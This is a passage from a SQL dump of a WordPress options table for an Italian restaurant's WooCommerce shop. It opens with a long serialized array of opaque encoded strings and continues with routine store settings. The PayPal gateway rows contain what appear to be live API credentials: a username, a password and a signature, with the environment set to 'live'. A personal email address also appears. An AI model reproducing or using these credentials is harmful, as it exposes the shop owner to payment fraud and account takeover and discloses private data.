?GUO[ggXLA\";i:569;s:15:\"9M>hT?GUO[*hXLA\";i:570;s:14:\"9M>hT?GU}j,ACA\";i:571;s:29:\"Rj>hT?GUO[PjXLggVElg*NNK0ElBA\";i:572;s:15:\"\"l=hT?GUO[~lXLA\";i:573;s:15:\"R@?hT?GUO[0kXLA\";i:574;s:13:\"Wx=hT?GU_vlBA\";i:575;s:29:\"B^?hT?GUO[jnXLFhVElg*NNK_ElBA\";i:576;s:15:\"5}?hT?GUO[0kXLA\";i:577;s:13:\"4r=hT?GUV8lBA\";i:578;s:13:\"\"l=hT?GU.DlBA\";i:579;s:15:\"R@>hT?GUO[.obLA\";i:580;s:15:\"Qj>hT?GUO[SqXLA\";i:581;s:15:\"mB@hT?GUO[3rbLA\";i:582;s:13:\"4r=hT?GUV8lBA\";i:583;s:15:\"Qj>hT?GUO[BtbLA\";i:584;s:13:\"c#=hT?GU]FlBA\";i:585;s:13:\">J=hT?GU^ClBA\";i:586;s:15:\">J=hT?GUO[muXLA\";i:587;s:15:\">J=hT?GUO[;vXLA\";i:588;s:15:\">J=hT?GUO[VxXLA\";i:589;s:15:\">J=hT?GUO[6yXLA\";i:590;s:15:\">J=hT?GUO[E0XLA\";i:591;s:13:\">J=hT?GU&FlBA\";i:592;s:15:\">J=hT?GUO[p1XLA\";i:593;s:15:\">J=hT?GUO[>2XLA\";i:594;s:12:\">J=hT?GU/A$A\";i:595;s:15:\">J=hT?GUO[Y4XLA\";i:596;s:15:\">J=hT?GUO[95XLA\";i:597;s:15:\">J=hT?GUO[UEXLA\";i:598;s:86:\"i#=hT?GU]FlBjL.4FxrjYB_A3(,\",ub@3X5FrvLvSQ[z,AEA$(k)NoaI:CDfzXJI|+wC[BgA]BJHNzRm8WEABA\";i:599;s:14:\"?2=hT?GU}j*ACA\";i:600;s:15:\"KV=hT?GUO[[9XLA\";i:601;s:13:\"c#=hT?GU]FlBA\";i:602;s:13:\">J=hT?GU^ClBA\";i:603;s:15:\">J=hT?GUO[muXLA\";i:604;s:15:\">J=hT?GUO[;vXLA\";i:605;s:15:\">J=hT?GUO[VxXLA\";i:606;s:15:\">J=hT?GUO[6yXLA\";i:607;s:15:\">J=hT?GUO[E0XLA\";i:608;s:13:\">J=hT?GU&FlBA\";i:609;s:15:\">J=hT?GUO[p1XLA\";i:610;s:15:\">J=hT?GUO[>2XLA\";i:611;s:12:\">J=hT?GU/A$A\";i:612;s:15:\">J=hT?GUO[Y4XLA\";i:613;s:15:\">J=hT?GUO[95XLA\";i:614;s:15:\">J=hT?GUO[b#XLA\";i:615;s:13:\"c#=hT?GU]FlBA\";i:616;s:13:\">J=hT?GU^ClBA\";i:617;s:15:\">J=hT?GUO[muXLA\";i:618;s:15:\">J=hT?GUO[;vXLA\";i:619;s:15:\">J=hT?GUO[VxXLA\";i:620;s:15:\">J=hT?GUO[6yXLA\";i:621;s:15:\">J=hT?GUO[E0XLA\";i:622;s:13:\">J=hT?GU&FlBA\";i:623;s:15:\">J=hT?GUO[p1XLA\";i:624;s:15:\">J=hT?GUO[>2XLA\";i:625;s:12:\">J=hT?GU/A$A\";i:626;s:15:\">J=hT?GUO[Y4XLA\";i:627;s:15:\">J=hT?GUO[95XLA\";i:628;s:14:\">J=hT?GU}jcBEA\";i:629;s:13:\"t8=hT?GU[IlBA\";i:630;s:13:\"t8=hT?GUjClBA\";i:631;s:15:\"t8=hT?GUO[$$XLA\";i:632;s:59:\"qB>hT?GUO[K&XLqiVElg*NhA3(\"\",ub@7L5FWuLvSQ[zfAc4rt,ub@195FA\";i:633;s:13:\"\"l=hT?GUzClBA\";i:634;s:26:\"Am=hT?GU8HlBZN.4FxrjYBFBQA\";i:635;s:24:\"Am=hT?GU.DlB_M.4Fxs@CABA\";i:636;s:13:\"\"l=hT?GU.DlBA\";i:637;s:13:\"nu>hT?GUDClBA\";i:638;s:13:\"(a>hT?GUITlBA\";i:639;s:14:\"_X?hT?GU}jJBEA\";i:640;s:29:\"5r=hT?GUO[e+XLSKVElg*NNKJFlBA\";i:641;s:50:\"NV=hT?GUO[VxXLjHVElg*NXAK\"ht,ub@{:5FJ1LvSQ[zGFUE$A\";i:642;s:15:\"`)=hT?GUO[(,XLA\";i:643;s:15:\"),=hT?GUO[N/XLA\";i:644;s:13:\"nu=hT?GUNElBA\";i:645;s:71:\"&M@hT?GUO[y:XLhNVElg*NXAK\"it,ub@gM5FhtLvSQ[zRAFtmt,ub@MI5FT3LvSQ[zu60WA\";i:646;s:221:\"oC1B+\",ub@%Z5FbvLvSQ[zOAG\"#(k)Noa.NcxWeGqI:$vbaUZl:CjXzXJI|+wC8Ei\"qBJHNzRmPtaA+h=hT?GUDClBEM.4Fxs@CA6F=hT?GUyFlBIM.4Fxs@CA$T=hT?GU^SlBQM.4FxrjYBbBQA\"AyD1+IT<hP\"b#_Q3nE3,H$AMDSOYM*+LjlB^L.4Fx}Mm36F)0LvSQ[zGFtJ$AWDSOYM?IItA\";i:647;s:29:\"LV=hT?GUO[|;XLXLVElg*NNK`RlBA\";i:648;s:68:\"F^=hT?GUhIlB8M.4Fxs@LA+h=hT?GUDClBEM.4Fxs@CA6F=hT?GUDClBIM.4Fxs@CABA\";i:649;s:13:\"nu=hT?GUxIlBA\";i:650;s:13:\"Wx>hT?GU.DlBA\";i:651;s:27:\"d#>hT?GUO[h=XL)UVElg*NXmKtA\";i:652;s:15:\"i=>hT?GUO[+>XLA\";i:653;s:57:\"Uj>hT?GUDClB3L.4Fxs@CAeZ=hT?GUDClB#L.4Fxs@CA|e=hT?GUDClBA\";i:654;s:114:\"+M@hT?GUO[Q@XL:CVElg*NXA2W)\",ub@MI5F+uLvSQ[zLA/hit,ub@MI5FLvLvSQ[zWBJt+\",ub@MI5FhtLvSQ[zLA/hjt,ub@MI5F$wLvSQ[z[AEA\";i:655;s:13:\"bS>hT?GUnGlBA\";i:656;s:13:\"c#>hT?GU.DlBA\";i:657;s:13:\"(a>hT?GUITlBA\";i:658;s:46:\"|X=hT?GUDClB7L.4Fxs@CANc=hT?GUDClB(L.4Fxs@CABA\";i:659;s:35:\"oB>hT?GUhIlBzL.4Fxs@LAI7=hT?GUhIlBA\";i:660;s:27:\"B^=hT?GUO[k_XL]KVElg*NLKNtA\";i:661;s:36:\"ou>hT?IUO[/`XL#zGFpFlB?HkcwY)!7\"fACA\";i:662;s:46:\"Tj=hT?GUDClBEM.4Fxs@CA6F=hT?GUDClBIM.4Fxs@CABA\";i:663;s:35:\"Bm=hT?GUzClBAM.4Fx}MEA[Q>hT?GUnGlBA\";i:664;s:15:\"KV>hT?GUO[C\"5FA\";i:665;s:141:\"EY=hT?GU}TlB7L.4FxrjcANc=hT?GU}TlB(L.4FxrjcAI7=hT?GUO[\"]XLZFVElg*N]BQA=\",ub@y2DAvWnbqI:$vb\"Ei\"8BJHNzRm8WQA1k=hT?GU8HlBAM.4Fx}MEA[Q>hT?GUnGlBA\";i:666;s:13:\"KV>hT?GU&FlBA\";i:667;s:167:\":M=hT?GU`MlBjL.4Fx~5SA[Q>hT?GUKNlB,L.4FxrjYBAAJt+\",ub@y2DAuWlBqI:$vbaUAAlBIM.4FxrjYBAAIAit,ub@MI5F2uLvSQ[zLAyWit,ub@MI5F{uLvSQ[zLAEA$(k)NoaI:C*ZzXJI|+wC]CgA7BJHNzzguWA\";i:668;s:101:\"*M=hT?GUOBlBjL.4Fx}MJA[Q>hT?GUnGlB,L.4Fxs@CA7y=hT?GUDClBfL.4Fxs@CAq1=hT?GUDClB|L.4Fx}MMAHO>hT?GUnGlBA\";i:669;s:47:\"pB>hT?GUhIlBFN.4Fx}M[G6F$wLvSQ[zeAc4kt,ub@ph5FA\";i:670;s:38:\"*a>hT?GU}j:AOc$(k)NoCQ:CFZzXJI|+wC{CgA\";i:671;s:24:\"Rj=hT?GUIDlBfL.4Fxs@HABA\";i:672;s:15:\"KV=hT?GUO[5FYLA\";i:673;s:24:\"Rj=hT?GUyFlBfL.4Fxs@HABA\";i:674;s:15:\"KV=hT?GUO[VxXLA\";i:675;s:14:\"KV=hT?GU~@RBEA\";i:676;s:13:\"KV=hT?GUjClBA\";i:677;s:13:\"KV=hT?GU!BlBA\";i:678;s:12:\"KV=hT?GU5A$A\";i:679;s:13:\"KV=hT?GUCFlBA\";i:680;s:13:\"KV=hT?GU3GlBA\";i:681;s:49:\"HH=hT?GUIDlBzL.4Fxs@GAeZ>hT?GU~@BBc4jt,ub@y2PcFtA\";i:682;s:15:\"KV=hT?GUO[oIYLA\";i:683;s:69:\"8r=hT?GUO[=JYL:CVElg*NNK8MlB7L.4FxrjYB1BS\")\",ub@y2EtFtrP_Q3nE30o6y5FA\";i:684;s:13:\"/o=hT?GU]FlBA\";i:685;s:13:\"/o=hT?GU1MlBA\";i:686;s:13:\"/o=hT?GU(ClBA\";i:687;s:15:\"/o=hT?GUO[8MYLA\";i:688;s:15:\"z:?hT?GUO[^XXLA\";i:689;s:15:\"Wx>hT?GUO[GOYLA\";i:690;s:13:\"Wx>hT?GUYTlBA\";i:691;s:15:\"Wx>hT?GUO[rPYLA\";i:692;s:15:\"A^=hT?GUO[UEYLA\";i:693;s:15:\"A^=hT?GUO[@QYLA\";i:694;s:15:\"A^=hT?GUO[aSYLA\";i:695;s:15:\"A^=hT?GUO[#TYLA\";i:696;s:15:\"A^=hT?GUO[JVYLA\";i:697;s:15:\"A^=hT?GUO[uWYLA\";i:698;s:15:\"A^=hT?GUO[^XYLA\";i:699;s:15:\"A^=hT?GUO[dZYLA\";i:700;s:15:\"A^=hT?GUO[&aYLA\";i:701;s:15:\"A^=hT?GUO[McYLA\";i:702;s:15:\"A^=hT?GUO[xdYLA\";i:703;s:26:\"B^=hT?GUUPlB^L.4FxrjYB9BQA\";i:704;s:15:\"4r=hT?GUO[aSYLA\";i:705;s:15:\"4r=hT?GUO[{eYLA\";i:706;s:15:\"4r=hT?GUO[ggYLA\";i:707;s:15:\"4r=hT?GUO[*hYLA\";i:708;s:15:\"4r=hT?GUO[PjYLA\";i:709;s:15:\"4r=hT?GUO[=JYLA\";i:710;s:15:\"4r=hT?GUO[0kYLA\";i:711;s:15:\"4r=hT?GUO[~lYLA\";i:712;s:15:\"4r=hT?GUO[jnYLA\";i:713;s:24:\"Rj=hT?GUDClBfL.4Fxs@HABA\";i:714;s:13:\"EH=hT?GUDClBA\";i:715;s:24:\"ig=hT?GUDClB0M.4FxrjFABA\";i:716;s:37:\"jg=hT?GUDClB0M.4FxrjFAq1=hT?GUO[.oYLA\";i:717;s:35:\"Bm=hT?GU8HlB(L.4Fx}MLAeZ=hT?GU<HlBA\";i:718;s:24:\"Rj=hT?GUDClBfL.4FxrjEABA\";i:719;s:15:\"t8=hT?GUO[\"]XLA\";i:720;s:13:\"(a>hT?GUITlBA\";i:721;s:13:\"?2=hT?GUDClBA\";i:722;s:29:\"j=>hT?GUO[SqYL9ZVElg*NNK$QlBA\";i:723;s:26:\"LV=hT?GUO[BtYLVRVElg*NlCQA\";i:724;s:117:\"CY=hT?GUyFlB7L.4FxrjEANc=hT?GUyFlB(L.4FxrjEA+h=hT?GUDClBEM.4Fxs@CA6F=hT?GUIDlBIM.4Fxs@CA$T=hT?GUO[muYLAgVElg*NNKVRlBA\";i:725;s:13:\"EH=hT?GUDClBA\";i:726;s:53:\"Cm=hT?GUzClBzL.4FxrjYBQCRtvBJHNzRm9(OA2[=hT?GUO[UEYLA\";i:727;s:15:\"9M>hT?GUO[6yYLA\";i:728;s:59:\",a=hT?GUoDlB(L.4Fxs@CA$T@hT?GUO[;vYLAgVElg*NXAJt*\",ub@ey5FA\";i:729;s:14:\"9M>hT?GU~@:ACA\";i:730;s:15:\"9M>hT?GUO[E0YLA\";i:731;s:37:\"GH=hT?GUIDlBmO.4FxrjUAI7=hT?GUO[\"]XLA\";i:732;s:99:\"AY=hT?GU}jaBbLit,ub@??5F+uLvSQ[zie1W(HqI:$vb\"Ei\"oBJHNzRmOAO\".o_Q3nE30oo.5F7vLvSQ[zGFNJ$AWDSOYM?IItA\";i:733;s:109:\"BY=hT?GU}jaBbLit,ub@??5F+uLvSQ[zie1W(HqI:$vb\"Ei\"oBJHNzRmOAO\".o_Q3nE33H$A~CSOYM*+LjlB}M.4Fx}MTAvW>hT?GUO[95YLA\";i:734;s:79:\"\"X=hT?GUDClB7L.4Fxs@CANc=hT?GUDClB(L.4Fxs@CA$T=hT?GU^ClBFN.4Fx}MbAvW>hT?GU.DlBA\";i:735;s:103:\"BY=hT?GUDClB7L.4Fxs@CANc=hT?GUDClB(L.4Fxs@CA$T=hT?GUhIlBwM.4Fxs@LAO/?hT?GUO[b#YLZFVElg*N_BRt4BJHNzzguWA\";i:736;s:26:\"M&>hT?GUO[$$YL_kVElg*NPAIA\";i:737;s:46:\"I0=hT?GUnGlBIM.4Fx}MJA|e=hT?GUoDlB7L.4Fxs@EABA\";i:738;s:26:\"@2=hT?GU}jXByWjt,ub@=1CFQA\";i:739;s:46:\"$M=hT?GU(SlBMM.4Fx~5SA|e=hT?GUoDlB7L.4Fxs@EABA\";i:740;s:13:\"c#=hT?GU]FlBA\";i:741;s:13:\">J=hT?GU^ClBA\";i:742;s:15:\">J=hT?GUO[muXLA\";i:743;s:15:\">J=hT?GUO[;vXLA\";i:744;s:15:\">J=hT?GUO[VxXLA\";i:745;s:15:\">J=hT?GUO[6yXLA\";i:746;s:15:\">J=hT?GUO[E0XLA\";i:747;s:13:\">J=hT?GU&FlBA\";i:748;s:15:\">J=hT?GUO[p1XLA\";i:749;s:15:\">J=hT?GUO[>2XLA\";i:750;s:12:\">J=hT?GU/A$A\";i:751;s:15:\">J=hT?GUO[Y4XLA\";i:752;s:15:\">J=hT?GUO[95XLA\";i:753;s:13:\"A^>hT?GU^ClBA\";i:754;s:15:\"A^>hT?GUO[muXLA\";i:755;s:15:\"A^>hT?GUO[;vXLA\";i:756;s:15:\"A^>hT?GUO[VxXLA\";i:757;s:15:\"A^>hT?GUO[6yXLA\";i:758;s:15:\"A^>hT?GUO[E0XLA\";i:759;s:13:\"A^>hT?GU&FlBA\";i:760;s:15:\"A^>hT?GUO[p1XLA\";i:761;s:15:\"A^>hT?GUO[>2XLA\";i:762;s:12:\"A^>hT?GU/A$A\";i:763;s:15:\"A^>hT?GUO[Y4XLA\";i:764;s:15:\"A^>hT?GUO[95XLA\";i:765;s:13:\"A^>hT?GUnGlBA\";i:766;s:13:\"yd>hT?GU^ClBA\";i:767;s:15:\"yd>hT?GUO[muXLA\";i:768;s:15:\"yd>hT?GUO[;vXLA\";i:769;s:15:\"yd>hT?GUO[VxXLA\";i:770;s:15:\"yd>hT?GUO[6yXLA\";i:771;s:15:\"yd>hT?GUO[E0XLA\";i:772;s:13:\"yd>hT?GU&FlBA\";i:773;s:15:\"yd>hT?GUO[p1XLA\";i:774;s:15:\"yd>hT?GUO[>2XLA\";i:775;s:12:\"yd>hT?GU/A$A\";i:776;s:15:\"yd>hT?GUO[Y4XLA\";i:777;s:15:\"yd>hT?GUO[95XLA\";i:778;s:13:\"yd>hT?GUnGlBA\";i:779;s:13:\"?2=hT?GU^ClBA\";i:780;s:15:\"?2=hT?GUO[muXLA\";i:781;s:15:\"?2=hT?GUO[;vXLA\";i:782;s:15:\"?2=hT?GUO[VxXLA\";i:783;s:15:\"?2=hT?GUO[6yXLA\";i:784;s:15:\"?2=hT?GUO[E0XLA\";i:785;s:13:\"?2=hT?GU&FlBA\";i:786;s:15:\"?2=hT?GUO[p1XLA\";i:787;s:15:\"?2=hT?GUO[>2XLA\";i:788;s:12:\"?2=hT?GU/A$A\";i:789;s:15:\"?2=hT?GUO[Y4XLA\";i:790;s:15:\"?2=hT?GUO[95XLA\";i:791;s:13:\"?2=hT?GUDClBA\";i:792;s:50:\"|X=hT?GU}j/Aa4#(k)No`,3B2W/\",ub@y2^QFt#T_Q3nE3{C$A\";i:793;s:13:\"/o=hT?GU]FlBA\";i:794;s:35:\"@J=hT?GU^ClBAM.4Fx}MEA6F=hT?GUIDlBA\";i:795;s:37:\"#M=hT?GUOBlBUM.4FxrjFA1k=hT?GUO[K&YLA\";i:796;s:36:\"#M=hT?GUOBlBUM.4FxrjFA1k=hT?GU~@EBEA\";i:797;s:112:\"CY=hT?GUDClB7L.4Fxs@CANc=hT?GUDClB(L.4Fxs@CA+h=hT?GUDClBEM.4Fxs@CA6F=hT?GUDClBIM.4Fxs@CA+h>hT?GUDClB^P.4Fxs@CABA\";i:798;s:139:\"Km=hT?GUzClBjL.4Fx}MEAvW=hT?GUDClB7L.4Fxs@CANc=hT?GUDClB(L.4Fxs@CA6F=hT?GUIDlBzL.4FxrjYB}A2W,\",ub@ph5FKyLvSQ[z`V0W{eqI:$vbuARt/BJHNzRmOAQ\"A\";i:799;s:46:\"Cm=hT?GU8HlBAM.4Fx}MEA6F=hT?GU<HlBFN.4Fx}MbABA\";i:800;s:26:\"!M@hT?GUO[Q@XL\"SVElg*NrAIA\";i:801;s:13:\"\"l=hT?GUzClBA\";i:802;s:24:\"Am=hT?GUzClBjL.4Fx}MEABA\";i:803;s:13:\"bS>hT?GUnGlBA\";i:804;s:36:\"ou>hT?IUO[/`XL#zGFpFlB?HkcwY)!7\"fACA\";i:805;s:63:\"Dm=hT?GUzClB3L.4Fx}Mc16FWuLvSQ[zcAc4jt,ub@y2_9Et.o_Q3nE30or?5FA\";i:806;s:13:\"EH=hT?GUoDlBA\";i:807;s:46:\"$M=hT?GU(SlB;L.4Fx~5DA+h=hT?GUyFlBfL.4Fxs@HABA\";i:808;s:59:\"&5=hT?GUIDlB(L.4FxrjEA6F=hT?GUDClBFN.4Fx}M5O6Fj3LvSQ[zM$yWA\";i:809;s:26:\"!M=hT?GU`MlBIM.4FxrjYBuCQA\";i:810;s:15:\"Qj=hT?GUO[.oYLA\";i:811;s:71:\"Em=hT?GU8HlB(L.4FxrjEA6F=hT?GUDClBZN.4Fx}M0t6FU0LvSQ[zu6yWtpqI:$vbu<U\"A\";i:812;s:24:\"Rj=hT?GUDClBIM.4Fxs@HABA\";i:813;s:15:\"i=>hT?GUO[(,YLA\";i:814;s:83:\"\"X=hT?GUyFlB7L.4Fxs@GANc=hT?GUyFlB(L.4Fxs@GA$T=hT?GU5A$AEDSOYMj<cAdA$T>hT?GUO[C\"5FA\";i:815;s:81:\"\"X=hT?GU<HlB7L.4Fxs@HANc=hT?GU<HlB(L.4Fxs@HA$T=hT?GU3GlBQM.4FxrjYB0CRt4BJHNzijwWA\";i:816;s:81:\"\"X=hT?GUKNlB7L.4Fx}MLANc=hT?GUKNlB(L.4Fx}MLA$T=hT?GU3GlBQM.4FxrjYB0CRt4BJHNzijwWA\";i:817;s:24:\"Am=hT?GUzClBjL.4Fx}MEABA\";i:818;s:13:\"Qj=hT?GU<HlBA\";i:819;s:13:\">J=hT?GU^ClBA\";i:820;s:26:\"!M>hT?GUO[|;YL0EVElg*N^AIA\";i:821;s:13:\"L&=hT?GUEPlBA\";}','no'),(9984,'woocommerce_default_country','IT:RN','yes'),(9985,'woocommerce_allowed_countries','specific','yes'),(9986,'woocommerce_all_except_countries','a:0:{}','yes'),(9987,'woocommerce_specific_allowed_countries','a:1:{i:0;s:2:\"IT\";}','yes'),(9988,'woocommerce_ship_to_countries','disabled','yes'),(9989,'woocommerce_specific_ship_to_countries','a:0:{}','yes'),(9990,'woocommerce_default_customer_address','base','yes'),(9991,'woocommerce_calc_taxes','no','yes'),(9992,'woocommerce_demo_store','no','yes'),(9993,'woocommerce_demo_store_notice','Questo è un negozio di prova &mdash; nessun ordine sarà preso in considerazione.','no'),(9994,'woocommerce_currency','EUR','yes'),(9995,'woocommerce_currency_pos','right','yes'),(9996,'woocommerce_price_thousand_sep','.','yes'),(9997,'woocommerce_price_decimal_sep',',','yes'),(9998,'woocommerce_price_num_decimals','2','yes'),(9999,'woocommerce_weight_unit','kg','yes'),(10000,'woocommerce_dimension_unit','cm','yes'),(10001,'woocommerce_enable_review_rating','yes','yes'),(10002,'woocommerce_review_rating_required','yes','no'),(10003,'woocommerce_review_rating_verification_label','yes','no'),(10004,'woocommerce_review_rating_verification_required','no','no'),(10005,'woocommerce_shop_page_id','207','yes'),(10006,'woocommerce_shop_page_display','','yes'),(10007,'woocommerce_category_archive_display','','yes'),(10008,'woocommerce_default_catalog_orderby','menu_order','yes'),(10009,'woocommerce_cart_redirect_after_add','no','yes'),(10010,'woocommerce_enable_ajax_add_to_cart','yes','yes'),(10011,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"262\";s:6:\"height\";s:3:\"325\";s:4:\"crop\";i:1;}','yes'),(10012,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"555\";s:6:\"height\";s:3:\"688\";s:4:\"crop\";i:1;}','yes'),(10013,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:2:\"83\";s:6:\"height\";s:3:\"103\";s:4:\"crop\";i:1;}','yes'),(10014,'woocommerce_enable_lightbox','yes','yes'),(10015,'woocommerce_manage_stock','yes','yes'),(10016,'woocommerce_hold_stock_minutes','30','no'),(10017,'woocommerce_notify_low_stock','yes','no'),(10018,'woocommerce_notify_no_stock','yes','no'),(10019,'woocommerce_stock_email_recipient','teosphone@gmail.com','no'),(10020,'woocommerce_notify_low_stock_amount','2','no'),(10021,'woocommerce_notify_no_stock_amount','0','yes'),(10022,'woocommerce_hide_out_of_stock_items','no','yes'),(10023,'woocommerce_stock_format','','yes'),(10024,'woocommerce_file_download_method','force','no'),(10025,'woocommerce_downloads_require_login','no','no'),(10026,'woocommerce_downloads_grant_access_after_payment','yes','no'),(10027,'woocommerce_prices_include_tax','no','yes'),(10028,'woocommerce_tax_based_on','shipping','yes'),(10029,'woocommerce_shipping_tax_class','inherit','yes'),(10030,'woocommerce_tax_round_at_subtotal','no','yes'),(10032,'woocommerce_tax_display_shop','excl','yes'),(10033,'woocommerce_tax_display_cart','excl','no'),(10034,'woocommerce_price_display_suffix','','yes'),(10035,'woocommerce_tax_total_display','itemized','no'),(10036,'woocommerce_enable_shipping_calc','yes','no'),(10037,'woocommerce_shipping_cost_requires_address','no','no'),(10038,'woocommerce_ship_to_destination','billing','no'),(10039,'woocommerce_enable_coupons','no','yes'),(10040,'woocommerce_calc_discounts_sequentially','no','no'),(10041,'woocommerce_enable_guest_checkout','yes','no'),(10042,'woocommerce_force_ssl_checkout','no','yes'),(10043,'woocommerce_unforce_ssl_checkout','no','yes'),(10044,'woocommerce_cart_page_id','208','yes'),(10045,'woocommerce_checkout_page_id','209','yes'),(10046,'woocommerce_terms_page_id','172','no'),(10047,'woocommerce_checkout_pay_endpoint','pagamento','yes'),(10048,'woocommerce_checkout_order_received_endpoint','ordine-ricevuto','yes'),(10049,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),(10050,'woocommerce_myaccount_delete_payment_method_endpoint','delete-payment-method','yes'),(10051,'woocommerce_myaccount_set_default_payment_method_endpoint','set-default-payment-method','yes'),(10052,'woocommerce_myaccount_page_id','210','yes'),(10053,'woocommerce_enable_signup_and_login_from_checkout','yes','no'),(10054,'woocommerce_enable_myaccount_registration','yes','no'),(10055,'woocommerce_enable_checkout_login_reminder','yes','no'),(10056,'woocommerce_registration_generate_username','yes','no'),(10057,'woocommerce_registration_generate_password','no','no'),(10058,'woocommerce_myaccount_orders_endpoint','ordini','yes'),(10059,'woocommerce_myaccount_view_order_endpoint','vedi-ordine','yes'),(10060,'woocommerce_myaccount_downloads_endpoint','downloads','yes'),(10061,'woocommerce_myaccount_edit_account_endpoint','modifica-account','yes'),(10062,'woocommerce_myaccount_edit_address_endpoint','indirizzi','yes'),(10063,'woocommerce_myaccount_payment_methods_endpoint','metodi-di-pagamento','yes'),(10064,'woocommerce_myaccount_lost_password_endpoint','password-persa','yes'),(10065,'woocommerce_logout_endpoint','customer-logout','yes'),(10066,'woocommerce_email_from_name','Sol Y Mar, ristorante a Riccione','no'),(10067,'woocommerce_email_from_address','notifiche@ristorantesolymar.it','no'),(10068,'woocommerce_email_header_image','','no'),(10069,'woocommerce_email_footer_text','Sol Y Mar, ristorante a Riccione','no'),(10070,'woocommerce_email_base_color','#557da1','no'),(10071,'woocommerce_email_background_color','#f5f5f5','no'),(10072,'woocommerce_email_body_background_color','#fdfdfd','no'),(10073,'woocommerce_email_text_color','#505050','no'),(10074,'woocommerce_api_enabled','yes','yes'),(10081,'woocommerce_admin_notices','a:0:{}','yes'),(10083,'_transient_woocommerce_webhook_ids','a:0:{}','yes'),(10084,'widget_woocommerce_widget_cart','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10085,'widget_woocommerce_layered_nav_filters','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10086,'widget_woocommerce_layered_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10087,'widget_woocommerce_price_filter','a:2:{i:2;a:1:{s:5:\"title\";s:15:\"Filter by price\";}s:12:\"_multiwidget\";i:1;}','yes'),(10088,'widget_woocommerce_product_categories','a:2:{i:2;a:8:{s:5:\"title\";s:10:\"Categories\";s:7:\"orderby\";s:5:\"order\";s:8:\"dropdown\";i:0;s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:18:\"show_children_only\";i:0;s:10:\"hide_empty\";i:1;s:9:\"max_depth\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(10089,'widget_woocommerce_product_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(10090,'widget_woocommerce_product_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10091,'widget_woocommerce_products','a:2:{i:2;a:7:{s:5:\"title\";s:8:\"Products\";s:6:\"number\";i:3;s:4:\"show\";s:0:\"\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:3:\"asc\";s:9:\"hide_free\";i:0;s:11:\"show_hidden\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(10092,'widget_woocommerce_rating_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10093,'widget_woocommerce_recent_reviews','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10094,'widget_woocommerce_recently_viewed_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10095,'widget_woocommerce_top_rated_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(10106,'woocommerce_paypal-ec_settings','a:1:{s:7:\"enabled\";s:3:\"yes\";}','yes'),(10107,'woocommerce_stripe_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(10108,'woocommerce_paypal_settings','a:21:{s:7:\"enabled\";s:3:\"yes\";s:5:\"email\";s:19:\"teosphone@gmail.com\";s:5:\"title\";s:6:\"PayPal\";s:11:\"description\";s:86:\"Paga con PayPal; puoi pagare con la tua carta di credito se non hai un account PayPal.\";s:8:\"testmode\";s:2:\"no\";s:5:\"debug\";s:2:\"no\";s:14:\"receiver_email\";s:19:\"teosphone@gmail.com\";s:14:\"identity_token\";s:0:\"\";s:14:\"invoice_prefix\";s:10:\"ecommerce-\";s:13:\"send_shipping\";s:2:\"no\";s:16:\"address_override\";s:2:\"no\";s:13:\"paymentaction\";s:4:\"sale\";s:10:\"page_style\";s:0:\"\";s:12:\"api_username\";s:24:\"teosphone_api1.gmail.com\";s:12:\"api_password\";s:0:\"\";s:13:\"api_signature\";s:56:\"AiKZhEEPLJjSIccz.2M.tbyW5YFwAADNHFqI1bEvCLCYttvZ1aK3YGQi\";s:16:\"ipn_notification\";s:3:\"yes\";s:9:\"image_url\";s:0:\"\";s:20:\"sandbox_api_username\";s:0:\"\";s:20:\"sandbox_api_password\";s:0:\"\";s:21:\"sandbox_api_signature\";s:0:\"\";}','yes'),(10109,'woocommerce_cheque_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(10110,'woocommerce_bacs_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(10111,'woocommerce_cod_settings','a:1:{s:7:\"enabled\";s:2:\"no\";}','yes'),(10113,'wc_ppec_version','2.1.1','yes'),(10123,'_transient_product_query-transient-version','1611924904','yes'),(10124,'_transient_product-transient-version','1611924904','yes'),(10151,'woocommerce_gateway_order','a:5:{s:4:\"bacs\";i:0;s:6:\"cheque\";i:1;s:3:\"cod\";i:2;s:6:\"paypal\";i:3;s:11:\"ppec_paypal\";i:4;}','yes'),(10185,'cofm_db_version','3','yes'),(10187,'external_updates-nm-woocommerce-checkout-field-manager','O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1603520873;s:14:\"checkedVersion\";s:3:\"6.0\";s:6:\"update\";N;}','no'),(10201,'woocommerce_ppec_payer_id_live_0dc75255f6caab79301fd63582cd201d','2T7SRYG6EF24J','yes'),(10202,'woocommerce_ppec_paypal_settings','a:26:{s:11:\"environment\";s:4:\"live\";s:12:\"api_username\";s:24:\"teosphone_api1.gmail.com\";s:12:\"api_password\";s:16:\"67Q4FYQYYD7WTLKE\";s:13:\"api_signature\";s:56:\"AiKZhEEPLJjSIccz.2M.tbyW5YFwAADNHFqI1bEvCLCYttvZ1aK3YGQi\";s:15:\"api_certificate\";s:0:\"\";s:11:\"api_subject\";s:0:\"\";s:7:\"enabled\";s:2:\"no\";s:11:\"button_size\";s:5:\"large\";s:12:\"mark_enabled\";s:2:\"no\";s:5:\"title\";s:23:\"PayPal Express Checkout\";s:11:\"description\";s:106:\"Pay using either your PayPal account or credit card. All credit card payments will be processed by 